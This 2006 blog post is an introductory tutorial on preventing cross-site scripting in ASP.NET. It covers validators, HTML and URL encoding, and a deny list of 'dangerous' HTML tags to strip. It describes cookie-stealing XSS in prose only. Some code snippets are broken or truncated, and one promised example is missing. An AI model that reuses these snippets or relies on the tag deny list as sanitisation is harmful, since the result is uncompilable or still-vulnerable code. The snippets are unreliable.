Geeks With Blogs
Blog Moved to Blog Moved to
One of the many purposes of this blog is to stay up to date with .NET security features.  One of the security topics that I'm going to cover today is Cross-Site Scripting (XSS) attacks.  First off, let's understand what XSS attacks are.
XSS attacks exploit vulnerabilities in Web-based input validation by injecting client side scripting, such as Javascript (JS) or Visual Basic Script (VBS).  Once the script has been sent to the server, the data is stored and then sent back to the user.  These attacks can even happen on Trusted Sites within Internet Explorer in which most scripting is allowed, thus making it more dangerous.
An example of an XSS attack is retrieving the authentication session cookie from the user's browser and posting the data against a known site to gain access to a particular site and get personal information.
To prevent these attacks, we need to employ one of the major tenets of security which is "Never trust user input".  These attacks arise because user input isn't properly validated and dangerous scripting isn't encoded which renders it useless.  Let's discuss each point on how to validate the data, HTML encoding and URL decoding.
To best validate data, use the built-in validators such as the RegularExpressionValidator.  This data can remove potentially dangerous HTML tags.  It gets more difficult as you want to only include certain HTML tags and disallow the rest. 
Let's see how we can use the RegularExpressionValidator to validate an employee ID which must be 8 digits.
<asp:TextBox id=txtEmployeeID runat="SERVER"></asp:TextBox>
   id=txtEmployeeID_validation runat="SERVER"
   ErrorMessage="Enter a valid employee ID."
We can also use the StringBuilder class to allow certain tags.  An example of this can be the following:
StringBuilder userInput = HttpUtility.HtmlEncode(Request.Form["executiveSummary"]));
userInput.Replace("&lt;b&gt;", "<b>");
The potentially dangerous HTML tags that we may want to remove with a regular expression or the StringBuilder.Replace method could be any of the following:
* <applet>
* <body>
* <embed>
* <frame>
* <script>
* <frameset>
* <html>
* <iframe>
* <img>
* <style>
* <layer>
* <link>
* <ilayer>
* <meta>
* <object>
Type conversions also be used on typed data, such as converting the input to an integer employee ID.  If the data cannot be parsed as the specified type, an exception is thrown.
An example of this would be:
     userDate = DateTime.Parse(Request.Form["userDate"], CultureInfo.CurrentCulture, DateTimeStyles.AllowWhiteSpaces);
     Response.Write("Invalid date");
HTML Encoding may also be used to turn HTML tags into encoded values.  For example, HTML encoding would take <HTML> and turn it into &lt;HTML&gt;.  The HttpUtility.HtmlEncode method allows the implementer to do this with ease.
An example of this would be:
Response.Write("User ID is "+ HttpUtility.HtmlEncode(Request.Form["userId"]));
If are representing part of the URL back to the client which contains user input, it may require sanitizing as well.  To sanitize the URL, use the HttpUtility.UrlEncode method. 
An example of this would be:
There are many other topics to cover and once again this is just an introduction.  Listed below are some resources to help with Cross Site Scripting issues.
MSDN How To's for Cross-Site Scripting:
MSDN Channel 9 lab on Cross-Site Scripting:
Microsoft Anti-Cross Site Scripting Library v1.0:
In future posts, I'll get more in detail with the Anti-Cross Site Scripting Library and what advantages it has.
Posted on Thursday, May 18, 2006 3:42 PM Microsoft , .NET , C# , ASP.NET | Back to top

Comments on this post: Understanding and Preventing Cross-Site Scripting

No comments posted yet.
Your comment:
 (will show your gravatar)

Copyright © Matthew Podwysocki | Powered by: